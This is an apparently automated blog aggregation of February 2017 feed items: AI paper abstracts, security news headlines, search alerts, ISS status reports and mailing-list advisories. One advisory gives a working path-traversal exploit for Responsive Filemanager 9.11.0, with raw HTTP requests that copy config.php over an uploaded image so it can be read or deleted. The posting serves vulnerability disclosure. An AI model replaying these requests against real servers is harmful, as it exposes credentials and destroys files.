pose reconstruction from monocular RGB images. The idea of generating multiple consistent and valid pose hypotheses can give rise to a new line of future work that has not previously been addressed in the literature.



from cs.AI updates on arXiv.org http://ift.tt/2k4GVzs
via IFTTT

A Historical Review of Forty Years of Research on CMAC. (arXiv:1702.02277v1 [cs.NE])

The Cerebellar Model Articulation Controller (CMAC) is an influential brain-inspired computing model in many relevant fields. Since its inception in the 1970s, the model has been intensively studied and many variants of the prototype, such as Kernel-CMAC, Self-Organizing Map CMAC, and Linguistic CMAC, have been proposed. This review article focus on how the CMAC model is gradually developed and refined to meet the demand of fast, adaptive, and robust control. Two perspective, CMAC as a neural network and CMAC as a table look-up technique are presented. Three aspects of the model: the architecture, learning algorithms and applications are discussed. In the end, some potential future research directions on this model are suggested.



from cs.AI updates on arXiv.org http://ift.tt/2kUP0pD
via IFTTT

Autonomous Braking System via Deep Reinforcement Learning. (arXiv:1702.02302v1 [cs.AI])

In this paper, we propose a new autonomous braking system based on deep reinforcement learning. The proposed autonomous braking system automatically decides whether to apply the brake at each time step when confronting the risk of collision using the information on the obstacle obtained by the sensors. The problem of designing brake control is formulated as searching for the optimal policy in Markov decision process (MDP) model where the state is given by the relative position of the obstacle and the vehicle's speed, and the action space is defined as whether brake is stepped or not. The policy used for brake control is learned through computer simulations using the deep reinforcement learning method called deep Q-network (DQN). In order to derive desirable braking policy, we propose the reward function which balances the damage imposed to the obstacle in case of accident and the reward achieved when the vehicle runs out of risk as soon as possible. DQN is trained for the scenario where a vehicle is encountered with a pedestrian crossing the urban road. Experiments show that the control agent exhibits desirable control behavior and avoids collision without any mistake in various uncertain environments.



from cs.AI updates on arXiv.org http://ift.tt/2lqbOe5
via IFTTT

Propagation via Kernelization: The Vertex Cover Constraint. (arXiv:1702.02470v1 [cs.AI])

The technique of kernelization consists in extracting, from an instance of a problem, an essentially equivalent instance whose size is bounded in a parameter k. Besides being the basis for efficient param-eterized algorithms, this method also provides a wealth of information to reason about in the context of constraint programming. We study the use of kernelization for designing propagators through the example of the Vertex Cover constraint. Since the classic kernelization rules often correspond to dominance rather than consistency, we introduce the notion of "loss-less" kernel. While our preliminary experimental results show the potential of the approach, they also show some of its limits. In particular, this method is more effective for vertex covers of large and sparse graphs, as they tend to have, relatively, smaller kernels.



from cs.AI updates on arXiv.org http://ift.tt/2kULn3b
via IFTTT

Deep Generalized Canonical Correlation Analysis. (arXiv:1702.02519v1 [cs.LG])

We present Deep Generalized Canonical Correlation Analysis (DGCCA) -- a method for learning nonlinear transformations of arbitrarily many views of data, such that the resulting transformations are maximally informative of each other. While methods for nonlinear two-view representation learning (Deep CCA, (Andrew et al., 2013)) and linear many-view representation learning (Generalized CCA (Horst, 1961)) exist, DGCCA is the first CCA-style multiview representation learning technique that combines the flexibility of nonlinear (deep) representation learning with the statistical power of incorporating information from many independent sources, or views. We present the DGCCA formulation as well as an efficient stochastic optimization algorithm for solving it. We learn DGCCA repre- sentations on two distinct datasets for three downstream tasks: phonetic transcrip- tion from acoustic and articulatory measurements, and recommending hashtags and friends on a dataset of Twitter users. We find that DGCCA representations soundly beat existing methods at phonetic transcription and hashtag recommendation, and in general perform no worse than standard linear many-view techniques.



from cs.AI updates on arXiv.org http://ift.tt/2kol42b
via IFTTT

Automatic Rule Extraction from Long Short Term Memory Networks. (arXiv:1702.02540v1 [cs.CL])

Although deep learning models have proven effective at solving problems in natural language processing, the mechanism by which they come to their conclusions is often unclear. As a result, these models are generally treated as black boxes, yielding no insight of the underlying learned patterns. In this paper we consider Long Short Term Memory networks (LSTMs) and demonstrate a new approach for tracking the importance of a given input to the LSTM for a given output. By identifying consistently important patterns of words, we are able to distill state of the art LSTMs on sentiment analysis and question answering into a set of representative phrases. This representation is then quantitatively validated by using the extracted phrases to construct a simple, rule-based classifier which approximates the output of the LSTM.



from cs.AI updates on arXiv.org http://ift.tt/2k4IbCF
via IFTTT

What is Wrong with Topic Modeling? (and How to Fix it Using Search-based Software Engineering). (arXiv:1608.08176v2 [cs.SE] UPDATED)

Context: Topic modeling finds human-readable structures in unstructured textual data. A widely used topic modeler is Latent Dirichlet allocation. When run on different datasets, LDA suffers from "order effects" i.e. different topics are generated if the order of training data is shuffled. Such order effects introduce a systematic error for any study. This error can relate to misleading results;specifically, inaccurate topic descriptions and a reduction in the efficacy of text mining classification results. Objective: To provide a method in which distributions generated by LDA are more stable and can be used for further analysis. Method: We use LDADE, a search-based software engineering tool that tunes LDA's parameters using DE (Differential Evolution). LDADE is evaluated on data from a programmer information exchange site (Stackoverflow), title and abstract text of thousands ofSoftware Engineering (SE) papers, and software defect reports from NASA. Results were collected across different implementations of LDA (Python+Scikit-Learn, Scala+Spark); across different platforms (Linux, Macintosh) and for different kinds of LDAs (VEM,or using Gibbs sampling). Results were scored via topic stability and text mining classification accuracy. Results: In all treatments: (i) standard LDA exhibits very large topic instability; (ii) LDADE's tunings dramatically reduce cluster instability; (iii) LDADE also leads to improved performances for supervised as well as unsupervised learning. Conclusion: Due to topic instability, using standard LDA with its "off-the-shelf" settings should now be depreciated. Also, in future, we should require SE papers that use LDA to test and (if needed) mitigate LDA topic instability. Finally, LDADE is a candidate technology for effectively and efficiently reducing that instability.



from cs.AI updates on arXiv.org http://ift.tt/2bvVgSF
via IFTTT

Decoding as Continuous Optimization in Neural Machine Translation. (arXiv:1701.02854v2 [cs.CL] UPDATED)

We propose a novel decoding approach for neural machine translation (NMT) based on continuous optimisation. The resulting optimisation problem is then tackled using constrained gradient optimisation. Our powerful decoding framework, enables decoding intractable models such as the intersection of left-to-right and right-to-left (bidirectional) as well as source-to-target and target-to-source (bilingual) NMT models. Our empirical results show that our decoding framework is effective, and leads to substantial improvements in translations generated from the intersected models where the typical greedy or beam search is infeasible.



from cs.AI updates on arXiv.org http://ift.tt/2j8JFKP
via IFTTT

THN Deal: Online CISSP Certification Training Course‎ (94% Off)

If you dream of making it big in the IT security community, the CISSP certification is a necessary milestone. Certified Information Systems Security Professional (CISSP) is a globally recognised certification in the field of information security, which has become a gold standard of achievement that is acknowledged worldwide. CISSP certification deals with a range of information security


from The Hacker News http://ift.tt/2lm54lo
via IFTTT

Anonymous web proxy java enable

An anonymizer or an anonymous proxy is a tool that attempts to make activity on the Internet script often used as anonymizer solution,; Java Anon ...

from Google Alert - anonymous http://ift.tt/2kIVWnF
via IFTTT

Anonymous Egg Donors Needed ASAP!

Attention Women 21-30: Become an Anonymous Egg Donor! Make up to $8000 + MORE While Helping Others! Would you like to make up to $8000+ ...

from Google Alert - anonymous http://ift.tt/2kn9FQg
via IFTTT

Anonymous no more: Google's new AI system unscrambles pixelated faces

Company reveals technology capable of increasing picture resolution 16-fold, effectively restoring lost data - but results still an educated guess ...

from Google Alert - anonymous http://ift.tt/2k3WebH
via IFTTT

Dandelion - Turning Bitcoin Into A Fully Anonymous Financial System

Bitcoin, and some other cryptocurrencies, have gained much popularity during the past few years. Even though bitcoin doesn't promote total ...

from Google Alert - anonymous http://ift.tt/2k4aUCW
via IFTTT

McShay Mock Draft 2.0: Ravens get Michigan State DT Malik McDowell at No. 16; "questions about his motor" - Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] Authentication bypass vulnerability in Western Digital My Cloud

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

New “Fileless Malware” Targets Banks and Organizations Spotted in the Wild

More than a hundred banks and financial institutions across the world have been infected with a dangerous sophisticated, memory-based malware that's almost undetectable, researchers warned. Newly published report by the Russian security firm Kaspersky Lab indicates that hackers are targeting banks, telecommunication companies, and government organizations in 40 countries, including the US,


from The Hacker News http://ift.tt/2k3Meub
via IFTTT

Tucson Metro Chamber releases results from anonymous survey

An anonymous survey sent to businesses across Tucson from the Tucson Metro Chamber gives an inside look at how the minimum wage increase ...

from Google Alert - anonymous http://ift.tt/2kSN0hK
via IFTTT

ISS Daily Summary Report – 2/07/2017

Japanese Experiment Module (JEM) Exposed Facility (EF) High Definition Television (HDTV) Camera Installation: Today, the crew installed the HDTV on the EFU Adapter which was then installed on the JEM Airlock Slide Table. The Slide Table was then retracted into the JEM Airlock, and the JEM Airlock was depressurized and leak checked in preparation for operations to install the HDTV Camera on the JEM EF later this week. This HDTV camera system delivered by HTV-6 will be used for earth observation from the ISS.  Vascular Echo Ultrasound: The crew successfully completed two ultrasound sessions scanning the neck, areas of the torso, and back of the knee, the in the crew’s morning then again in the afternoon, both while wearing electrocardiogram (ECG) electrodes.  In between the sessions, the crew wore leg cuffs. This Canadian Space Agency (CSA) investigation examines changes in blood vessels, and the heart, while the crew members are in space, and then follow their recovery on return to Earth. The results could provide insight into potential countermeasures to help maintain crew member health, and quality of life for everyone. Commercial Off the Shelf (COTS) Ultra-High Frequency (UHF) Communication Unit (CUCU) Software Update: Today, the crew updated the spare CUCU software to the latest version. This required the crew to demate cables from the prime CUCU and transfer them to the spare. Once connected, the spare CUCU was updated to the latest software version. The cables were transferred back to the prime CUCU, and the system was put back into a nominal configuration.  Moderate Temperature Loop (MTL) Internal Thermal Control System (ITCS) Switchover: Today the crew reconfigured the Airlock MTL plumbing from being connected to the Lab ITCS to Node 3 ITCS prior to Node 1 Galley Rack activation.  If cooling to the upcoming Node 1 Galley rack was activated while the Airlock is still plumbed to the Lab, inadequate cooling may be available for payloads being performed in the Lab. Therefore, the Airlock MTL reconfiguration to Node 3 was performed prior to the activation of Node 1 Galley Rack, which is planned later this week. During Galley Rack MTL jumper installation, the keying positions of jumper Quick Disconnects (QDs) did not fit the expected connection QDs. The mismatch in keying prevents the mating of the QDs. Crew has stood down from activity and left the ITCS QDs demated until a forward plan can be discussed. Lab Carbon Dioxide Removal Assembly (CDRA) Valve Troubleshooting: Lab CDRA Air Selector Valve (ASV) Remote Power Controller Module (RPCM) LAD62B-A Remote Power Controller (RPC) 12 has been experiencing seemingly random overcurrent trips since March 2014. On January 31, 2017 the crew installed a new troubleshooting cable that connected to RPC 5 and moved three of the valves to be powered through that cable, with a final configuration of 3 valves on RPC 12 and 3 on RPC 5. On February 6, the Lab CDRA RPCM LAD62B-A RPC 05 tripped indicating that one of the valves on that cable is suspect. Today the crew swapped the cable connection on ASV101 to RPC 12 to continue troubleshooting.  RPC 5 then tripped again. Crew then moved ASV103 to RPC 12 to further isolate the trip and RPC 5 tripped again indicating ASV102 as the likely cause of the trips. Ground teams will meet to discuss further troubleshooting before making any hardware changes. Today’s Planned Activities All activities were completed unless otherwise noted. МО-11. Blood Sample Collection XF305 Camcorder Setup JEM Airlock Slide Table (ST) Extension to JPM Side JEM Exposed Facility Hight Definition TV Camera Installation Payload Hardware CTB Cleanup Station Support Computer 2 Relocate Photo/TV Camcorder Setup Verification МО-11. Blood Biochemistry Analysis Filling (separation) of ЕДВ (КОВ) for Elektron or ЕДВ-СВ SPHERES Battery Setup COL1O2 and COL1O3 Aft Backfill СОЖ maintenance PROFILAKTIKA-2. Photo/Video Ops Photo/TV Camcorder Setup Verification PROFILAKTIKA-2. Operator Assistance in Preparation for the Experiment JEM Airlock Slide Table (ST) Retraction from JPM Side JEM Airlock Depressurization Ultrasound 2 HRF Rack 1 Power On Compound Specific Analyzer-Combustion Products (CSA-CP) Extended Maintenance Delta file prep Vascular Echo Leg Cuffs Ultrasound Scan 1 – Subject Photo/TV Camcorder Setup Verification PROFILAKTIKA-2. Close-out ops (Operator) Regenerative Environmental Control and Life Support System (RGN) Wastewater Storage Tank Assembly (WSTA) Fill Portable Computer System (PCS) Hard Drive (HD) Swap and Image Reminder Multi Omics FOS intake MERLIN2 Desiccant Swap Veggie Fan Alteration JEM Airlock Vent LDST Camera Setup Video of answers to the questions from ROSCOSMOS social network subscribers CUCU Video Payload NAS Photos COTS UHF Communication Unit (CUCU) Software Update Part 1 JEM Airlock Vent Confirmation SPHERES Battery Swap Airlock Moderate Temperature Loop (MTL) Internal Thermal Control System (ITCS) Switchover Recharging Samsung tablet in 48S Video Recording of Greetings MATRYOSHKA-R. BUBBLE-dosimeter gathering and measurements. Multi Omics FOS Stow Multi Omics FOS Preparation Vascular Echo Leg Cuffs Ultrasound Scan 2 – Subject Vacuum Cleaning СКПФ1, СКПФ2 Dust Filter Cartridge and MRM1 Gas-Liquid Heat Exchanger (ГЖТ) Radi-N Detector Retrieval/Readout Radiation Dosimetry Inside ISS-Neutrons Hardware Handover MATRYOSHKA-R. Handover of BUBBLE-dosimeter detectors from USOS. COTS UHF Communication Unit (CUCU) Software Update MATRYOSHKA-R. BUBBLE-dosimeter gathering and measurements. Carbon Dioxide Removal Assembly (CDRA) Valve Power Cable (W1796) Post Installation Reconfiguration Recharging Samsung tablet in 48S – end Public Affairs Office (PAO) High Definition (HD) Config LAB Setup Advanced Resistive Exercise Device (ARED) Exercise Video Stow PAO Preparation Public Affairs Office (PAO) Event in High Definition (HD) – Lab Carbon Dioxide Removal Assembly (CDRA) Valve Power Cable (W1796) Post Installation Reconfiguration Rodent Research Crew Conference Completed Task List Items New Food Evaluation KTO Replacement Manufacturing Device Print Removal, Clean and Stow   Ground Activities All activities were completed unless otherwise noted. JEMAL Operations MSS Powerup and SPDM Diagnostics  Three-Day Look Ahead: Wednesday, 02/08: 49S Emergency Drill OBT, Dragon OBT, Lighting Effects, Galley Food Warmer Relocate, Neuromapping Thursday, 02/09: SPHERES Docking Port Run, Skinsuit Measurements, Galley MERLIN transfer, Story Time – Buoy Demo, EVA Safer Checkout, CIR Bottle Replace Friday, 02/10: JEM Accumulator Package R&R, PMA2 Ingress, RELL and JOTI Install on JEMAL Slide Table, FIR Rack Light […]

from ISS On-Orbit Status Report http://ift.tt/2kSBPWa
via IFTTT

Anonymous

Find & apply online for the latest Jobs from Anonymous with reed.co.uk, the UK's #1 job site.

from Google Alert - anonymous http://ift.tt/2kSvR7I
via IFTTT

Mr. Anonymous getting better with age

Connecting People through News. All-you-can-read digital newsstand with thousands of the world's most popular newspapers and magazines.

from Google Alert - anonymous http://ift.tt/2k2aiCB
via IFTTT

Thousands of WordPress Sites Hacked Using Recently Disclosed Vulnerability

Last week, we reported about a critical zero-day flaw in WordPress that was silently patched by the company before hackers have had their hands on the nasty bug to exploit millions of WordPress websites. To ensure the security of millions of websites and its users, WordPress delayed the vulnerability disclosure for over a week and worked closely with security companies and hosts to install


from The Hacker News http://ift.tt/2k0XVln
via IFTTT

Tuesday, February 7, 2017

0

120mm Anonymous Fan Grill. ... by Looney, published Feb 8, 2017. Anonymous 120mm Fan Grill by Looney 43 mins ago. 1 3 0. Thingiview ...

from Google Alert - anonymous http://ift.tt/2kQVVQE
via IFTTT

ASHACL: Alternative Shapes Constraint Language. (arXiv:1702.01795v1 [cs.AI])

ASHACL, a variant of the W3C Shapes Constraint Language, is designed to determine whether an RDF graph meets some conditions. These conditions are grouped into shapes, which validate whether particular RDF terms each meet the constraints of the shape. Shapes are themselves expressed as RDF triples in an RDF graph, called a shapes graph.



from cs.AI updates on arXiv.org http://ift.tt/2kjRZ82
via IFTTT

Extracting Lifted Mutual Exclusion Invariants from Temporal Planning Domains. (arXiv:1702.01886v1 [cs.AI])

We present a technique for automatically extracting mutual exclusion invariants from temporal planning instances. It first identifies a set of invariant templates by inspecting the lifted representation of the domain and then checks these templates against properties that assure invariance. Our technique builds on other approaches to invariant synthesis presented in the literature, but departs from their limited focus on instantaneous actions by addressing temporal domains. To deal with time, we formulate invariance conditions that account for the entire structure of the actions and the possible concurrent interactions between them. As a result, we construct a significantly more comprehensive technique than previous methods, which is able to find not only invariants for temporal domains, but also a broader set of invariants for non-temporal domains. The experimental results reported in this paper provide evidence that identifying a broader set of invariants results in the generation of fewer multi-valued state variables with larger domains. We show that, in turn, this reduction in the number of variables reflects positively on the performance of a number of temporal planners that use a variable/value representation by significantly reducing their running time.



from cs.AI updates on arXiv.org http://ift.tt/2kpnJLv
via IFTTT

Learning what matters - Sampling interesting patterns. (arXiv:1702.01975v1 [stat.ML])

In the field of exploratory data mining, local structure in data can be described by patterns and discovered by mining algorithms. Although many solutions have been proposed to address the redundancy problems in pattern mining, most of them either provide succinct pattern sets or take the interests of the user into account-but not both. Consequently, the analyst has to invest substantial effort in identifying those patterns that are relevant to her specific interests and goals. To address this problem, we propose a novel approach that combines pattern sampling with interactive data mining. In particular, we introduce the LetSIP algorithm, which builds upon recent advances in 1) weighted sampling in SAT and 2) learning to rank in interactive pattern mining. Specifically, it exploits user feedback to directly learn the parameters of the sampling distribution that represents the user's interests. We compare the performance of the proposed algorithm to the state-of-the-art in interactive pattern mining by emulating the interests of a user. The resulting system allows efficient and interleaved learning and sampling, thus user-specific anytime data exploration. Finally, LetSIP demonstrates favourable trade-offs concerning both quality-diversity and exploitation-exploration when compared to existing methods.



from cs.AI updates on arXiv.org http://ift.tt/2loifPC
via IFTTT

Representations of language in a model of visually grounded speech signal. (arXiv:1702.01991v1 [cs.CL])

We present a visually grounded model of speech perception which projects spoken utterances and images to a joint semantic space. We use a multi-layer recurrent highway network to model the temporal nature of spoken speech, and show that it learns to extract both form and meaning-based linguistic knowledge from the input signal. We carry out an in-depth analysis of the representations used by different components of the trained model and show that encoding of semantic aspects tends to become richer as we go up the hierarchy of layers, whereas encoding of form-related aspects of the language input tends to initially increase and then plateau or decrease.



from cs.AI updates on arXiv.org http://ift.tt/2kFyO9S
via IFTTT

Solving the Brachistochrone Problem by an Influence Diagram. (arXiv:1702.02032v1 [math.OC])

Influence diagrams are a decision-theoretic extension of probabilistic graphical models. In this paper we show how they can be used to solve the Brachistochrone problem. We present results of numerical experiments on this problem, compare the solution provided by the influence diagram with the optimal solution. The R code used for the experiments is presented in the Appendix.



from cs.AI updates on arXiv.org http://ift.tt/2kFftFS
via IFTTT

Landmark-Based Plan Recognition. (arXiv:1604.01277v3 [cs.AI] UPDATED)

Recognition of goals and plans using incomplete evidence from action execution can be done efficiently by using planning techniques. In many applications it is important to recognize goals and plans not only accurately, but also quickly. In this paper, we develop a heuristic approach for recognizing plans based on planning techniques that rely on ordering constraints to filter candidate goals from observations. These ordering constraints are called landmarks in the planning literature, which are facts or actions that cannot be avoided to achieve a goal. We show the applicability of planning landmarks in two settings: first, we use it directly to develop a heuristic-based plan recognition approach; second, we refine an existing planning-based plan recognition approach by pre-filtering its candidate goals. Our empirical evaluation shows that our approach is not only substantially more accurate than the state-of-the-art in all available datasets, it is also an order of magnitude faster.



from cs.AI updates on arXiv.org http://ift.tt/1SOnFhC
via IFTTT

Playing SNES in the Retro Learning Environment. (arXiv:1611.02205v2 [cs.LG] UPDATED)

Mastering a video game requires skill, tactics and strategy. While these attributes may be acquired naturally by human players, teaching them to a computer program is a far more challenging task. In recent years, extensive research was carried out in the field of reinforcement learning and numerous algorithms were introduced, aiming to learn how to perform human tasks such as playing video games. As a result, the Arcade Learning Environment (ALE) (Bellemare et al., 2013) has become a commonly used benchmark environment allowing algorithms to train on various Atari 2600 games. In many games the state-of-the-art algorithms outperform humans. In this paper we introduce a new learning environment, the Retro Learning Environment --- RLE, that can run games on the Super Nintendo Entertainment System (SNES), Sega Genesis and several other gaming consoles. The environment is expandable, allowing for more video games and consoles to be easily added to the environment, while maintaining the same interface as ALE. Moreover, RLE is compatible with Python and Torch. SNES games pose a significant challenge to current algorithms due to their higher level of complexity and versatility.



from cs.AI updates on arXiv.org http://ift.tt/2fxNDcb
via IFTTT

GuessWhat?! Visual object discovery through multi-modal dialogue. (arXiv:1611.08481v2 [cs.AI] UPDATED)

We introduce GuessWhat?!, a two-player guessing game as a testbed for research on the interplay of computer vision and dialogue systems. The goal of the game is to locate an unknown object in a rich image scene by asking a sequence of questions. Higher-level image understanding, like spatial reasoning and language grounding, is required to solve the proposed task. Our key contribution is the collection of a large-scale dataset consisting of 150K human-played games with a total of 800K visual question-answer pairs on 66K images. We explain our design decisions in collecting the dataset and introduce the oracle and questioner tasks that are associated with the two players of the game. We prototyped deep learning models to establish initial baselines of the introduced tasks.



from cs.AI updates on arXiv.org http://ift.tt/2gwMwZi
via IFTTT

NewsQA: A Machine Comprehension Dataset. (arXiv:1611.09830v3 [cs.CL] UPDATED)

We present NewsQA, a challenging machine comprehension dataset of over 100,000 human-generated question-answer pairs. Crowdworkers supply questions and answers based on a set of over 10,000 news articles from CNN, with answers consisting of spans of text from the corresponding articles. We collect this dataset through a four-stage process designed to solicit exploratory questions that require reasoning. A thorough analysis confirms that NewsQA demands abilities beyond simple word matching and recognizing textual entailment. We measure human performance on the dataset and compare it to several strong neural models. The performance gap between humans and machines (0.198 in F1) indicates that significant progress can be made on NewsQA through future research. The dataset is freely available at http://ift.tt/2li9b1K.



from cs.AI updates on arXiv.org http://ift.tt/2g3UxFf
via IFTTT

Webform: Not accessible by anonymous user

I have enabled publish in the content type and menu, permission access to both anonymous and authenticated user. Can anyone please guide me ...

from Google Alert - anonymous http://ift.tt/2jZPqH9
via IFTTT

ISS Daily Summary Report – 2/06/2017

H-II Transfer Vehicle (HTV)-6 Deorbit:  HTV-6 successfully completed all three deorbit burns over the weekend.  Loss of telemetry occurred Sunday 05-February at 15:11:21 GMT at an altitude of 80 km over the South Pacific near 50° S, 142° W.  Lighting Effects Vision Test: This morning the crew unstowed the Visual Performance Test hardware, then configured the Solid State Lighting Assembly (SSLA) in their Crew Quarters (CQ) to the correct mode, turning off all other light sources, then performed one Numerical Verification Test and one Color Discrimination Test. The Lighting Effects investigation studies the impact of the change from fluorescent light bulbs to solid-state light-emitting diodes (LEDs) with adjustable intensity and color and aims to determine if the new lights can improve crew circadian rhythms, sleep, and cognitive performance. JEM Airlock (JEMAL) Repress: The crew repressed and conducted a leak check of the JEMAL with the Exposed Facility Unit-5 (EFU5) adapter on the slide table.  Tomorrow the crew will install the HDTV EF-2. HDTV-EF2 is a high-definition television camera system delivered by HTV-6, which will be used for earth observation from the ISS.   Dragon On-Board Training (OBT):  The crew participated in a conference with Ground Specialists in preparation of the start of robotics OBT for the upcoming Dragon rendezvous and capture.  Following this conference, they reviewed the OBT materials and then performed computer based proficiency training on the Dragon mission profile, the Dragon rendezvous crew procedures and the crew interfaces for monitoring and commanding.  Today’s Planned Activities All activities were completed unless otherwise noted. EarthKAM. Crew conference with P/L Developer БД-2 end switch adjustment. DAN Experiment Ops. Regenerative Environmental Control and Life Support System (ECLSS) Recycle Tank Drain TIMER. Battery charge Photo T/V (P/TV) Advanced Resistive Exercise Device (ARED) Exercise Video Setup VEG-03 Plant Photo Habitability Human Factors Directed Observations – Subject Lighting Effects Visual Performance Tests Light Setting – Subject Station Support Computer (SSC) 5 LAB Setup Atmosphere Control and Supply (ACS) Nitrogen Manual Valve Open Exercise Data Downlink via OCA COTS UHF Communication Unit (CUCU) File Transfer Atmosphere Control and Supply (ACS) Nitrogen Manual Valve Close COTS UHF Communication Unit (CUCU) Software Update DVD Check EarthKAM. Installation and activation of h/w in Node2 TIMER. Preparation and start of video recording of experiment ops Environmental Health System (EHS) Total Organic Carbon Analyzer (TOCA) Water Recovery System (WRS) Sample Analysis VIZIR. Experiment Ops. On-Board Training (OBT) Dragon OBT Conference On-board Training (OBT) Dragon Robotics Review On-board Training (OBT) Dragon Rendezvous Review TIMER. Video registration termination and close out ops  Photo and Video Recording of Life on Station IMS Update МО-11. Setup. REFLOTRON h/w JEM Airlock Press Activation of Video Streaming on PWS HRF Generic Urine Collection Setup Photo/TV Camcorder Setup Verification JEM Airlock Leak Check Deactivation of Video Streaming on PWS Multi-purpose Small Payload Rack (MSPR) /Group Combustion Module (GCM) Component Activation Activation of Video Streaming on PWS CB/ISS CREW CONFERENCE Deactivation of Video Streaming on PWS Environmental Health System (EHS) Total Organic Carbon Analyzer (TOCA) Sample Data Record Completed Task List Items Structures and Mechanisms Docking Mechanism Accessory Kit Audit Food Consolidate Pt 2 EVA service and cooling umbilical dryout LAB1O5 Audit Treadmill 2 System (T2) Monthly Inspection COL1F2 Cue Card Replacement ESA Active Dosimeter Area Monitoring Mobile Unit Stow ESA PAO Recorded Message “France Info Q&A Set 3” ESA PAO Recorded Message “Future jobs in the EU” CLPA Pack/US EVA 39 Cleanup EXPRESS Locker Prep Health Maintenance System (HMS) Automated External Defibrillator (AED) Inspection On-Orbit Hearing Assessment (O-OHA) with EarQ Software Setup and Test NanoRacks Platform-1 Module-63 Secure Photo/TV CAMCORDER MICROPHONE CHECK Photo/TV Node 3 Camcorder Swap Payloads Network Attached Storage (NAS) Vent Cleaning Dragon 10 Prepack New Food Evaluation VEG-03 Watering Space Automated Bioproduct Lab, CO2 Incubator Removal EVA Housekeeping Ground Activities All activities were completed unless otherwise noted. 3A1 Battery Capacity Test MCA Zero Calibration Three-Day Look Ahead: Tuesday, 02/07: HDTV Install JEMAL, Vascular Echo, Fast Neuron Spectrometer Relocate, A/L MTL Config, EVA Battery Charger Checkout, CUCU S/W Update Wednesday, 02/08: 49S EMER Drill OBT, Dragon OBT, Lighting Effects, Galley Food Warmer Relocate, Neuromapping Thursday, 02/09: SPHERES Docking Port Run, Skinsuit Measurements, Galley MERLIN transfer, Story Time – Buoy Demo, EVA Safer Checkout, CIR Bottle Replace QUICK ISS Status – Environmental Control Group:     Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Standby Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2kohRSG
via IFTTT

[FD] Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure/Deletion

[+] Exploit Title: Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure/Deletion [+] Date: 7 Feb 2017 [+] Vulnerability and Exploit Author: Wiswat Aswamenakul [+] Vendor Homepage: http://ift.tt/1jVBlah [+] Affected version: only tested on 9.11.0 and 9.7.3 (other versions might be affected) [+] Tested on: Ubuntu 14.04, PHP 5.5.9 [+] Category: webapps [+] Description Responsive filemanger is a PHP based file manager that make use of AJAX technology. It has various useful features. One of them is copy/cut and paste files. However, the copy/cut feature does not santize file name that will be copied/cut. Therefore, it is possible for attackers to copied/cut any files including PHP files and paste them to overwrite existing image files. Then, the attackers could download the overwritten image files to read the content of the copied/cut files. Moreover, for the cut feature, it can cause the original files to be deleted as well. [+] Exploit 1. Upload a normal image file (jpg, png, gif) to a server 2. Right click at any files, select copy and capture the request with Burp Suite (or any local proxy) 3. Change parameter "path" to any file name that we would like to download, for example, path=../filemanager/config/config.php ### POST /fm/filemanager/ajax_calls.php?action=copy_cut HTTP/1.1 Host: 192.168.1.128 Content-Length: 53 Accept: */* Origin: http://192.168.1.128 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://ift.tt/2kE9mSa Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: last_position=%2F; PHPSESSID=lenmc074o86fe2sq7i1dtnh8j0 Connection: close path=../filemanager/config/config.php&sub_action=copy ### 4. Go to any sub directory, right click at any files, intercept the request with burp, select "Paste to this directory" 5. Change parameter "path" to the image file uploaded in step 1, for example, path=subdir/size.png ### POST /fm/filemanager/execute.php?action=paste_clipboard HTTP/1.1 Host: 192.168.1.128 Content-Length: 20 Accept: */* Origin: http://192.168.1.128 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://ift.tt/2ko4ths Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: last_position=subdir%2F; PHPSESSID=lenmc074o86fe2sq7i1dtnh8j0 Connection: close path=subdir/size.png ### 6. Download the image file uploaded in step 1, it will contain content of the file specified in step 3 [+] Note (about another issue I found) During this report, I found another separated issue with the attack filtering that only check for "../" but not "..\" which can be used to bypass all filters if the application runs on Windows server and reported the issue to the owner as well. However, I found out that this issue was found by a guy from hacktizen and detailed in following blog post http://ift.tt/2kE2JPA So, the credit goes for the guy who firstly reported. Perhaps, the guy from hackitizen did not contact the owner of responsive filemanger or there are any problems with communication. Therefore, the issue remains unresolved. [+] Timeline - 02/01/2017: Contact Owner - 05/02/2017: Patched version is available - 07/02/2017: Public Advisory

Source: Gmail -> IFTTT-> Blogger

Smart TV Maker Fined $2.2 Million For Spying on Its 11 Million Users

Your government is spying on you! Businesses are spying on you! Your phone and browser are constantly spying on you! Even your TV is spying on you! Yes, you should also worry about your "smart" TV, as one of the world's biggest smart TV makers Vizio has been caught secretly collecting its consumers' data through over 11 Million smart TVs and then selling them to third-parties without the


from The Hacker News http://ift.tt/2jYZLYM
via IFTTT

[FD] SEC Consult SA-20170207 :: Path Traversal, Backdoor accounts & KNX group address password bypass in JUNG Smart Visu server

SEC Consult Vulnerability Lab Security Advisory < 20170207-0 > ======================================================================= title: Path Traversal, Backdoor accounts & KNX group address password bypass product: JUNG Smart Visu Server vulnerable version: Firmware v1.0.804/1.0.830/1.0.832 fixed version: Firmware v1.0.900 CVE number: - impact: Critical homepage: http://www.jung.de/ found: 2016-11-10 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich http://ift.tt/1mGHMNR ======================================================================= Vendor description:

